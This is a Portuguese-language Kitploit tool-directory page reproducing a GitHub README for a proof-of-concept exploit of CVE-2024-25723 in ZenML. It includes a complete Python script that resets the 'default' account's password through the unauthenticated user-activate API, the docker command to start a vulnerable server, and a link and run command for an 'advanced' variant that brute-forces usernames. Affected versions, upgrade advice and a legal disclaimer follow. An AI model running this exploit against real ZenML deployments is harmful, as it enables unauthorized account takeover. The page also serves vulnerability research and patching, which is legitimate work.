Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
exploit-CVE-2024-25723 — Exploração de Prova de Conceito educacional para CVE-2024-25723, demonstrando tomada de conta não autorizada no ZenML via redefinição de senha por API, com detecção de versão e enumeração de nomes de usuário por força bruta. | Kitploit
Ferramentas/GitHubGitHub/david-botelho-mariano/exploit-cve-2024-25723
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubdavid-botelho-mariano/exploit-cve-2024-25723

exploit-CVE-2024-25723

Exploração de Prova de Conceito educacional para CVE-2024-25723, demonstrando tomada de conta não autorizada no ZenML via redefinição de senha por API, com detecção de versão e enumeração de nomes de usuário por força bruta.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
42há 2 anosAinda não revisado

Exploit para CVE-2024-25723

Este repositório é dedicado a abordar a CVE-2024-25723, uma vulnerabilidade crítica de segurança no ZenML, com uma Prova de Conceito (PoC) educacional fornecida para ilustrar o problema e incentivar a mitigação imediata. A PoC demonstra como um usuário não autorizado poderia potencialmente explorar a vulnerabilidade para assumir o controle de qualquer conta do ZenML.

Prova de conceito (PoC)

  1. Inicie o servidor ZenML através do Docker.

docker run -it -d -p 8080:8080 --name zenml zenmldocker/zenml-server:0.46.0

  1. Salve o código abaixo como "exploit-CVE-2024-25723.py" e então execute "python exploit-CVE-2024-25723.py".
root@kitploit:~
import requests

base_url = "http://localhost:8080"
user = "default"
new_password = "3gx9AbzP92rfHhZ"

activate_api_url = f"{base_url}/api/v1/users/{user}/activate"
activate_api_headers = {"Content-Type": "application/json"}
activate_api_json={"password": new_password}
activate_api_response = requests.put(activate_api_url, headers=activate_api_headers, json=activate_api_json)
print(activate_api_response.json())
  1. Se o usuário padrão chamado "default" estiver registrado e o ZenML estiver em uma versão vulnerável, o exploit será executado com sucesso e a nova senha para esta conta será: "3gx9AbzP92rfHhZ" (para o exploit funcionar, é necessário saber o nome do usuário alvo).

Exploit avançado

A diferença entre a PoC e o exploit avançado é que o exploit avançado realiza brute force nos nomes de usuário mais usados e também é capaz de detectar se a versão é vulnerável ou não através de uma API que vaza a versão do ZenML. Para usar o exploit avançado, salve o seguinte código em um arquivo:

https://github.com/david-botelho-mariano/exploit-CVE-2024-25723/blob/main/advanced-exploit-CVE-2024-25723.py

O comando para executar este exploit é:

python3 advanced-exploit-CVE-2024-25723.py https://example.com

Versões Afetadas:

Todas as versões do ZenML abaixo de 0.46.7 são vulneráveis, com exceção das seguintes versões de patch: (0.44.4, 0.43.1, 0.42.2).

Ação Imediata Necessária:

Atualize para a versão mais recente (0.46.7 ou superior) ou para uma das versões corrigidas (0.44.4, 0.43.1, 0.42.2) para mitigar este risco.

Aviso Legal

A Prova de Conceito (PoC) fornecida neste repositório é apenas para fins educacionais e de pesquisa em segurança. As informações e o código são destinados a serem usados por profissionais de segurança cibernética e pesquisadores para entender e proteger contra vulnerabilidades em software e sistemas. Qualquer uso desta PoC, informações relacionadas ou código para atacar alvos sem consentimento mútuo prévio é ilegal e estritamente proibido.

Ao usar esta PoC, você concorda que compreende o impacto potencial da vulnerabilidade que ela demonstra e que a utilizará de forma responsável e ética. Os autores desta PoC se isentam de qualquer responsabilidade por qualquer uso indevido deste material ou por quaisquer danos que possam ocorrer pelo uso das informações e do código fornecidos. É responsabilidade do usuário final obedecer a todas as leis locais, estaduais, nacionais e internacionais aplicáveis.

Os autores fizeram todos os esforços para garantir a precisão e confiabilidade das informações fornecidas neste repositório. No entanto, as informações são fornecidas "como estão" sem garantia de qualquer tipo. Os autores não aceitam qualquer responsabilidade ou obrigação pela precisão, conteúdo, completude, legalidade ou confiabilidade das informações contidas.

Baixar ferramenta